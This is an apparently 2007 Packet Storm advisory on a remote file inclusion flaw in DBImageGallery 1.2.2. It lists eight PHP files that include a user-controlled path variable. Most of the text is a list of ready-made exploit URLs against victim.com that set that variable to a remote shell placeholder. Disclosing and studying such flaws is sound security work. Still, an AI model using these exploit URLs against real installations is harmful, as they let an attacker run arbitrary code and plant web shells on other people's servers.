dbimage-rfi.txt

2007-03-06T00:00:00
ID PACKETSTORM:54844
Type packetstorm
Reporter Hasadya Raed
Modified 2007-03-06T00:00:00

Description

                                        
                                            `Remote File Include In DBImageGallery 1.2.2  
Discovered By : Hasadya Raed  
Contact Me : RaeD@BsdMail.Com  
Download Script :   
http://www.dbscripts.net/download/?file=1  
  
B.Files:  
  
admin/attributes.php -> require_once $donsimg_base_path  
admin/images.php -> require_once $donsimg_base_path  
admin/scan.php -> require_once $donsimg_base_path  
includes/attributes.php -> require_once $donsimg_base_path  
includes/db_utils.php -> require_once $donsimg_base_path  
includes/images.php -> require_once $donsimg_base_path  
includes/utils.php -> require_once $donsimg_base_path  
includes/values.php -> require_once $donsimg_base_path  
  
Exploits :   
  
http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack]  
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack]  
  
  
--   
`